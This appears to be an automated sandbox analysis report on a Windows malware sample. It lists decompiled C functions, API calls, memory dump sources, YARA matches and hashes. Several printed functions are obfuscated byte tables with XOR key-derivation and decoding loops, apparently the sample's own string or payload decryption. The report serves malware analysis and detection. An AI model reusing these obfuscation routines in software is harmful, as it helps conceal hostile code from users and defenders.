                                                                                					_v195 = 0x8e;
                                                                                					_v194 = 0x8f;
                                                                                					_v193 = 0x5c;
                                                                                					_v192 = 0xb2;
                                                                                					_v191 = 0x3d;
                                                                                					_v190 = 0x21;
                                                                                					_v189 = 0x74;
                                                                                					_v188 = 0x40;
                                                                                					_v187 = 0x4b;
                                                                                					_v186 = 0xb5;
                                                                                					_v185 = 6;
                                                                                					_v184 = 0x6e;
                                                                                					_v183 = 0xab;
                                                                                					_v182 = 0x7a;
                                                                                					_v181 = 0xbd;
                                                                                					_v180 = 0x8b;
                                                                                					_v179 = 0xa9;
                                                                                					_v178 = 0x7e;
                                                                                					_v177 = 0x32;
                                                                                					_v176 = 0x8f;
                                                                                					_v175 = 0x6e;
                                                                                					_v174 = 6;
                                                                                					_v173 = 0x24;
                                                                                					_v172 = 0xd9;
                                                                                					_v171 = 0x29;
                                                                                					_v170 = 0xa4;
                                                                                					_v169 = 0xa5;
                                                                                					_v168 = 0xbe;
                                                                                					_v167 = 0x26;
                                                                                					_v166 = 0x23;
                                                                                					_v165 = 0xfd;
                                                                                					_v164 = 0xee;
                                                                                					_v163 = 0xf1;
                                                                                					_v162 = 0x4c;
                                                                                					_v161 = 0xf;
                                                                                					_v160 = 0x74;
                                                                                					_v159 = 0x5e;
                                                                                					_v158 = 0x58;
                                                                                					_v157 = 0xfb;
                                                                                					_v156 = 0x91;
                                                                                					_v155 = 0x74;
                                                                                					_v154 = 0xef;
                                                                                					_v153 = 0x91;
                                                                                					L0044B531();
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					_t231 = 7;
                                                                                					_push(0x11);
                                                                                					asm("movsb");
                                                                                					_push( &_v320);
                                                                                					_push( &_v152);
                                                                                					memcpy( &_v348, 0x4435b8, _t231 << 2);
                                                                                					L0044B575();
                                                                                					_v8 =  &_v280;
                                                                                					_v296 =  *((intOrPtr*)(_t219 + 0x18));
                                                                                					_v12 = 0x90;
                                                                                					_v300 =  *(_t219 + 2) & 0x0000ffff;
                                                                                					if(E0040C860( &_v24,  &_v300,  &_v12, 0,  &_v288) != 0) {
                                                                                						L9:
                                                                                						_t184 = _v284;
                                                                                						if(_t184 != 0) {
                                                                                							E0041118A(_v292 + 0x68,  &(_t184[4]),  *_t184 & 0x000000ff, 0);
                                                                                							_t184 =  *0x4430d8(_v284);
                                                                                						}
                                                                                						L11:
                                                                                						if(_v24 == 0) {
                                                                                							goto L13;
                                                                                						}
                                                                                						return  *0x443100(_v24);
                                                                                					}
                                                                                					_push(0x1c);
                                                                                					_push( &_v348);
                                                                                					_push( &_v152);
                                                                                					L0044B575();
                                                                                					_v8 =  &_v280;
                                                                                					_v12 = 0x9b;
                                                                                					_t184 = E0040C860( &_v24,  &_v300,  &_v12, 0,  &_v288);
                                                                                					if(_t184 == 0) {
                                                                                						goto L11;
                                                                                					}
                                                                                					goto L9;
                                                                                				}
                                                                                			}

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.765485228.0000000000400000.00000004.00000001.sdmp
                                                                                • Associated: 00000001.00000002.765637451.0000000000482000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
                                                                                • API String ID: 0-140969752
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00492660,0000000C,0048B177,00000000,00000000,?,?,0048A6BF,0048910E), ref: 0048B04E
                                                                                • __crt_waiting_on_module_handle.LIBCMT ref: 0048B059
                                                                                  • Part of subcall function 0048A15C: Sleep.KERNEL32(000003E8,?,?,0048AF9F,KERNEL32.DLL,?,0048A6EC,?,00489108,?), ref: 0048A168
                                                                                  • Part of subcall function 0048A15C: GetModuleHandleW.KERNEL32(?,?,?,0048AF9F,KERNEL32.DLL,?,0048A6EC,?,00489108,?), ref: 0048A171
                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0048B082
                                                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0048B092
                                                                                • __lock.LIBCMT ref: 0048B0B4
                                                                                • InterlockedIncrement.KERNEL32(004934D8), ref: 0048B0C1
                                                                                • __lock.LIBCMT ref: 0048B0D5
                                                                                • ___addlocaleref.LIBCMT ref: 0048B0F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                • API String ID: 1028249917-2843748187
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                • API String ID: 0-3760989150
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 45%
                                                                                			E004660BE(signed int _a4) {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				char _v7;
                                                                                				char _v8;
                                                                                				char _v9;
                                                                                				char _v10;
                                                                                				char _v11;
                                                                                				char _v12;
                                                                                				char _v13;
                                                                                				char _v14;
                                                                                				char _v15;
                                                                                				char _v16;
                                                                                				char _v17;
                                                                                				char _v18;
                                                                                				char _v19;
                                                                                				char _v20;
                                                                                				char _v24;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				intOrPtr _v36;
                                                                                				char _v291;
                                                                                				char _v292;
                                                                                				char _v547;
                                                                                				char _v548;
                                                                                				char _v1058;
                                                                                				char _v1060;
                                                                                				char _v1570;
                                                                                				char _v1572;
                                                                                				char* _t81;
                                                                                				char* _t82;
                                                                                				signed int _t84;
                                                                                				signed int _t85;
                                                                                				signed int _t87;
                                                                                				signed int _t89;
                                                                                				signed int _t92;
                                                                                				signed int _t97;
                                                                                				intOrPtr* _t102;
                                                                                				signed short* _t103;
                                                                                				intOrPtr _t106;
                                                                                				void* _t107;
                                                                                
                                                                                				_t85 = 0;
                                                                                				_v20 = 0xa3;
                                                                                				_v19 = 0x1e;
                                                                                				_v18 = 0xf3;
                                                                                				_v17 = 0x69;
                                                                                				_v16 = 7;
                                                                                				_v15 = 0x62;
                                                                                				_v14 = 0xd9;
                                                                                				_v13 = 0x1f;
                                                                                				_v12 = 0x1e;
                                                                                				_v11 = 0xe9;
                                                                                				_v10 = 0x35;
                                                                                				_v9 = 0x7d;
                                                                                				_v8 = 0x4f;
                                                                                				_v7 = 0xd2;
                                                                                				_v6 = 0x7d;
                                                                                				_v5 = 0x48;
                                                                                				_v292 = 0;
                                                                                				L004703F4();
                                                                                				_v548 = 0;
                                                                                				L004703F4();
                                                                                				_v1572 = 0;
                                                                                				L004703F4();
                                                                                				_v1060 = 0;
                                                                                				L004703F4();
                                                                                				_v36 = _a4 + 4;
                                                                                				_a4 = 0;
                                                                                				_v24 = 0xff;
                                                                                				 *0x412090( &_v292,  &_v24,  &_v1058, 0, 0x1fe,  &_v1570, 0, 0x1fe,  &_v547, 0, 0xff,  &_v291, 0, 0xff);
                                                                                				_v24 = 0xff;
                                                                                				 *0x412018( &_v548,  &_v24);
                                                                                				_t102 =  *0x4120d0; // 0x758dffff
                                                                                				 *_t102(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                                                                				 *_t102(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                                                                				_t81 =  &_v292;
                                                                                				_push(_t81);
                                                                                				L004703B6();
                                                                                				_v32 = _t81;
                                                                                				_t82 =  &_v548;
                                                                                				_push(_t82);
                                                                                				L004703B6();
                                                                                				_t106 = _v36;
                                                                                				_v28 = _t82;
                                                                                				_push(0x10);
                                                                                				_push( &_v20);
                                                                                				_push(_t106);
                                                                                				L0047043C();
                                                                                				_t84 = 0xba0da71d;
                                                                                				if(_v28 > 0) {
                                                                                					_t103 =  &_v1060;
                                                                                					do {
                                                                                						_t97 = _a4 & 0x80000003;
                                                                                						if(_t97 < 0) {
                                                                                							_t97 = (_t97 - 0x00000001 | 0xfffffffc) + 1;
                                                                                						}
                                                                                						_t89 = ( *_t103 & 0x0000ffff) * _t84;
                                                                                						_t84 = _t84 * 0xbc8f;
                                                                                						 *(_t106 + _t97 * 4) =  *(_t106 + _t97 * 4) ^ _t89;
                                                                                						_a4 = _a4 + 1;
                                                                                						_t103 =  &(_t103[1]);
                                                                                					} while (_a4 < _v28);
                                                                                				}
                                                                                				if(_v32 > _t85) {
                                                                                					do {
                                                                                						_t92 = _a4 & 0x80000003;
                                                                                						if(_t92 < 0) {
                                                                                							_t92 = (_t92 - 0x00000001 | 0xfffffffc) + 1;
                                                                                						}
                                                                                						_t87 = ( *(_t107 + _t85 * 2 - 0x620) & 0x0000ffff) * _t84;
                                                                                						_t84 = _t84 * 0xbc8f;
                                                                                						 *(_t106 + _t92 * 4) =  *(_t106 + _t92 * 4) ^ _t87;
                                                                                						_a4 = _a4 + 1;
                                                                                						_t85 = _t85 + 1;
                                                                                					} while (_t85 < _v32);
                                                                                				}
                                                                                				return _t84;
                                                                                			}

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.765485228.0000000000400000.00000004.00000001.sdmp
                                                                                • Associated: 00000001.00000002.765637451.0000000000482000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                • API String ID: 0-3760989150
                                                                                • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                • Instruction ID: 085fb8e70ef0eada5a1d20243ecae5196f57fe3971bb647bf342fdf5a836fb3c
                                                                                • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                • Instruction Fuzzy Hash: 0251DA7180025DEEDB11DBA8CC40EEEBBBCEF49314F0481EAE559E6191D3789B44CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 0048CF6C
                                                                                  • Part of subcall function 0048B19C: __getptd_noexit.LIBCMT ref: 0048B19F
                                                                                  • Part of subcall function 0048B19C: __amsg_exit.LIBCMT ref: 0048B1AC
                                                                                • __amsg_exit.LIBCMT ref: 0048CF8C
                                                                                • __lock.LIBCMT ref: 0048CF9C
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048CFB9
                                                                                • InterlockedIncrement.KERNEL32(023A2BA8), ref: 0048CFE4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                • String ID:
                                                                                • API String ID: 4271482742-0
                                                                                • Opcode ID: 114407788101702029c1cf3570820ac91b4b06e623bc90de322d190a27ff3239
                                                                                • Instruction ID: f892595e6e8bc3b7f9317b1e981c58d7ef87b17b483e3ce9e4092376cc7d32d2
                                                                                • Opcode Fuzzy Hash: 114407788101702029c1cf3570820ac91b4b06e623bc90de322d190a27ff3239
                                                                                • Instruction Fuzzy Hash: F101E131A01611ABEB11BF25884575E7B61AB01715F04482BEB00A77D0C73C6D41CBEE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __lock.LIBCMT ref: 0048B595
                                                                                  • Part of subcall function 00489445: __mtinitlocknum.LIBCMT ref: 0048945B
                                                                                  • Part of subcall function 00489445: __amsg_exit.LIBCMT ref: 00489467
                                                                                  • Part of subcall function 00489445: RtlEnterCriticalSection.NTDLL(?), ref: 0048946F
                                                                                • ___sbh_find_block.LIBCMT ref: 0048B5A0
                                                                                • ___sbh_free_block.LIBCMT ref: 0048B5AF
                                                                                • HeapFree.KERNEL32(00000000,?,004926D0,0000000C,00489426,00000000,00492600,0000000C,00489460,?,?,?,0048D525,00000004,004927D0,0000000C), ref: 0048B5DF
                                                                                • GetLastError.KERNEL32(?,0048D525,00000004,004927D0,0000000C,0048B660,?,?,00000000,00000000,00000000,?,0048B14E,00000001,00000214), ref: 0048B5F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 2714421763-0
                                                                                • Opcode ID: d18479402430aaefc509c439dfa1981fd13e13dfd7b7db6e0fc83a726df78f6b
                                                                                • Instruction ID: 80bad2d6a6bfc3f9f804d1c8ca66343406cc332f6b57d3fdcfd0cf5f46b783a0
                                                                                • Opcode Fuzzy Hash: d18479402430aaefc509c439dfa1981fd13e13dfd7b7db6e0fc83a726df78f6b
                                                                                • Instruction Fuzzy Hash: B601F731902705BEDF307F729C0A76E7A64DF00768F24492FF500A6690CB3C89818B9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $/A$,/A$0/A$X7A$`7A
                                                                                • API String ID: 0-851144607
                                                                                • Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                • Instruction ID: 4428056738c1ec361f974de153bb2c1ca2297caa9b4de1d09cfaf12758fc748c
                                                                                • Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                • Instruction Fuzzy Hash: 094182B0655642EFC3098F2AC5846C1FFE0BB09314F95C2AFC46C9B221C7B4A565CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $/A$,/A$0/A$4/A$`7A
                                                                                • API String ID: 0-2435369464
                                                                                • Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                • Instruction ID: 0a08b35f92fb99a00e0bf9f6e867f43e276e1d31ddc6d6f82e1f0a13e65aa554
                                                                                • Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                • Instruction Fuzzy Hash: 6A01F6B4000B498AC721EF61C1846D6BBF0FB45309F51C80FE0A98A204CFF8A19ACF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 0048CCD0
                                                                                  • Part of subcall function 0048B19C: __getptd_noexit.LIBCMT ref: 0048B19F
                                                                                  • Part of subcall function 0048B19C: __amsg_exit.LIBCMT ref: 0048B1AC
                                                                                • __getptd.LIBCMT ref: 0048CCE7
                                                                                • __amsg_exit.LIBCMT ref: 0048CCF5
                                                                                • __lock.LIBCMT ref: 0048CD05
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765682016.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                                Similarity
                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                • String ID:
                                                                                • API String ID: 3521780317-0
                                                                                • Opcode ID: aff873874d459d0b2c8ad7d468af57647c14f91cfa5aaa355a2b0f9b258fcab5
                                                                                • Instruction ID: fdb5c6d65f8cd6ed5de720e99c888756382875035551d096808b3d9f95a16156
                                                                                • Opcode Fuzzy Hash: aff873874d459d0b2c8ad7d468af57647c14f91cfa5aaa355a2b0f9b258fcab5
                                                                                • Instruction Fuzzy Hash: 95F09632A007009FD721FB76844675E77E0AB41715F144D6FE544AB291CB7C5D019BAE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E0046FCFC(void* __eax, void* __edi) {
                                                                                				unsigned int _v5;
                                                                                				signed int _v6;
                                                                                				signed int _v7;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _t36;
                                                                                				void* _t55;
                                                                                				signed char _t56;
                                                                                				char* _t66;
                                                                                				void* _t67;
                                                                                				void* _t68;
                                                                                
                                                                                				_t67 = __edi;
                                                                                				_t55 = __eax;
                                                                                				_push(__eax);
                                                                                				_t68 = 0;
                                                                                				L004703B6();
                                                                                				_t36 = __eax + 0xfffffffd;
                                                                                				_v16 = _t36;
                                                                                				if(_t36 < 0) {
                                                                                					L18:
                                                                                					 *((char*)(_t68 + _t67)) = 0;
                                                                                					return _t68;
                                                                                				}
                                                                                				_v12 = 0xfffffffe;
                                                                                				_v12 = _v12 - __eax;
                                                                                				_t5 = _t55 + 2; // 0x46fe76
                                                                                				_t66 = _t5;
                                                                                				while(1) {
                                                                                					_t6 = _t66 - 2; // 0x75fff88b
                                                                                					_t38 =  *_t6;
                                                                                					if( *_t6 != 0x2e) {
                                                                                						_v6 = E0046FCC8(_t38);
                                                                                					} else {
                                                                                						_v6 = 0x3e;
                                                                                					}
                                                                                					_t9 = _t66 - 1; // 0xfc75fff8
                                                                                					_t40 =  *_t9;
                                                                                					if( *_t9 != 0x2e) {
                                                                                						_v5 = E0046FCC8(_t40);
                                                                                					} else {
                                                                                						_v5 = 0x3e;
                                                                                					}
                                                                                					_t42 =  *_t66;
                                                                                					if( *_t66 != 0x2e) {
                                                                                						_t56 = E0046FCC8(_t42);
                                                                                					} else {
                                                                                						_t56 = 0x3e;
                                                                                					}
                                                                                					_t44 =  *((intOrPtr*)(_t66 + 1));
                                                                                					if( *((intOrPtr*)(_t66 + 1)) != 0x2e) {
                                                                                						_v7 = E0046FCC8(_t44);
                                                                                					} else {
                                                                                						_v7 = 0x3e;
                                                                                					}
                                                                                					 *(_t67 + _t68) = _v5 >> 0x00000004 | _v6 << 0x00000002;
                                                                                					if( *_t66 == 0x2d) {
                                                                                						break;
                                                                                					}
                                                                                					 *(_t68 + _t67 + 1) = _t56 >> 0x00000002 | _v5 << 0x00000004;
                                                                                					if( *((char*)(_t66 + 1)) == 0x2d) {
                                                                                						 *((char*)(_t68 + _t67 + 2)) = 0;
                                                                                						_t34 = _t68 + 2; // 0x2
                                                                                						return _t34;
                                                                                					}
                                                                                					_t68 = _t68 + 3;
                                                                                					 *(_t68 + _t67 - 1) = _t56 << 0x00000006 | _v7;
                                                                                					_t25 = _t68 + 5; // 0x2
                                                                                					_t66 = _t66 + 4;
                                                                                					if(_t25 >= 0x3ff || _v12 + _t66 > _v16) {
                                                                                						goto L18;
                                                                                					} else {
                                                                                						continue;
                                                                                					}
                                                                                				}
                                                                                				 *(_t68 + _t67 + 1) = 0;
                                                                                				_t31 = _t68 + 1; // 0x1
                                                                                				return _t31;
                                                                                			}















                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.765485228.0000000000400000.00000004.00000001.sdmp
                                                                                • Associated: 00000001.00000002.765637451.0000000000482000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: >$>$>$s&F
                                                                                • API String ID: 0-573601131
                                                                                • Opcode ID: 63af057b9fe0049d645aef51361d4680daff9370bba2b9f986e1d9a123f48411
                                                                                • Instruction ID: 2eac1ac47f149cc7f756bd3d5d00c452ac80f5de0da29780c2b8aa333607b310
                                                                                • Opcode Fuzzy Hash: 63af057b9fe0049d645aef51361d4680daff9370bba2b9f986e1d9a123f48411
                                                                                • Instruction Fuzzy Hash: 9831B25180D6C99ED7118A6890467EFFFA54F22308F1886ABC0D657383E26C754E879B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Executed Functions

                                                                                C-Code - Quality: 65%
                                                                                			E00405C78(intOrPtr __eax) {
                                                                                				intOrPtr _v8;
                                                                                				void* _v12;
                                                                                				char _v15;
                                                                                				char _v17;
                                                                                				char _v18;
                                                                                				char _v22;
                                                                                				int _v28;
                                                                                				char _v289;
                                                                                				long _t44;
                                                                                				long _t61;
                                                                                				long _t63;
                                                                                				CHAR* _t70;
                                                                                				CHAR* _t72;
                                                                                				struct HINSTANCE__* _t78;
                                                                                				struct HINSTANCE__* _t84;
                                                                                				char* _t94;
                                                                                				void* _t95;
                                                                                				intOrPtr _t99;
                                                                                				struct HINSTANCE__* _t107;
                                                                                				void* _t110;
                                                                                				void* _t112;
                                                                                				intOrPtr _t113;
                                                                                
                                                                                				_t110 = _t112;
                                                                                				_t113 = _t112 + 0xfffffee0;
                                                                                				_v8 = __eax;
                                                                                				GetModuleFileNameA(0,  &_v289, 0x105);
                                                                                				_v22 = 0;
                                                                                				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                				if(_t44 == 0) {
                                                                                					L3:
                                                                                					_push(_t110);
                                                                                					_push(0x405d7d);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t113;
                                                                                					_v28 = 5;
                                                                                					E00405AC0( &_v289, 0x105);
                                                                                					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405EE4, 0, 0,  &_v22,  &_v28) != 0) {
                                                                                						_v22 = 0;
                                                                                					}
                                                                                					_v18 = 0;
                                                                                					_pop(_t99);
                                                                                					 *[fs:eax] = _t99;
                                                                                					_push(E00405D84);
                                                                                					return RegCloseKey(_v12);
                                                                                				} else {
                                                                                					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                					if(_t61 == 0) {
                                                                                						goto L3;
                                                                                					} else {
                                                                                						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                                						if(_t63 != 0) {
                                                                                							_push(0x105);
                                                                                							_push(_v8);
                                                                                							_push( &_v289);
                                                                                							L00401310();
                                                                                							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                                                                                							_t107 = 0;
                                                                                							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                                                                								_t70 =  &_v289;
                                                                                								_push(_t70);
                                                                                								L00401318();
                                                                                								_t94 = _t70 +  &_v289;
                                                                                								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                                                                                									_t94 = _t94 - 1;
                                                                                								}
                                                                                								_t72 =  &_v289;
                                                                                								if(_t94 != _t72) {
                                                                                									_t95 = _t94 + 1;
                                                                                									if(_v22 != 0) {
                                                                                										_push(0x105 - _t95 - _t72);
                                                                                										_push( &_v22);
                                                                                										_push(_t95);
                                                                                										L00401310();
                                                                                										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                                                                									}
                                                                                									if(_t107 == 0 && _v17 != 0) {
                                                                                										_push(0x105 - _t95 -  &_v289);
                                                                                										_push( &_v17);
                                                                                										_push(_t95);
                                                                                										L00401310();
                                                                                										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                                										_t107 = _t78;
                                                                                										if(_t107 == 0) {
                                                                                											_v15 = 0;
                                                                                											_push(0x105 - _t95 -  &_v289);
                                                                                											_push( &_v17);
                                                                                											_push(_t95);
                                                                                											L00401310();
                                                                                											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                                											_t107 = _t84;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							return _t107;
                                                                                						} else {
                                                                                							goto L3;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}

























                                                                                0x00000000
                                                                                0x00405cf5
                                                                                0x00405cd7

                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001,004103FC,00405AA4,00406550,0000FF98,?), ref: 00405C94
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C,?,00405A68,00400000,?,00000105,00000001), ref: 00405CB2
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C), ref: 00405CD0
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405CEE
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D37
                                                                                • RegQueryValueExA.ADVAPI32(?,00405EE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001), ref: 00405D55
                                                                                • RegCloseKey.ADVAPI32(?,00405D84,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D77
                                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405D94
                                                                                • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA1
                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DA7
                                                                                • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD2
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E19
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E29
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E51
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E61
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405E87
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405E97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                • API String ID: 1759228003-2375825460
                                                                                • Opcode ID: 3911d75fb344ff54600c729ed1e39e570585950d4f09cac6ef099054284f545c
                                                                                • Instruction ID: 50d7fcff162f8a2787b95d462eaa17d1600671633a99a01d037d82dc5577e201
                                                                                • Opcode Fuzzy Hash: 3911d75fb344ff54600c729ed1e39e570585950d4f09cac6ef099054284f545c
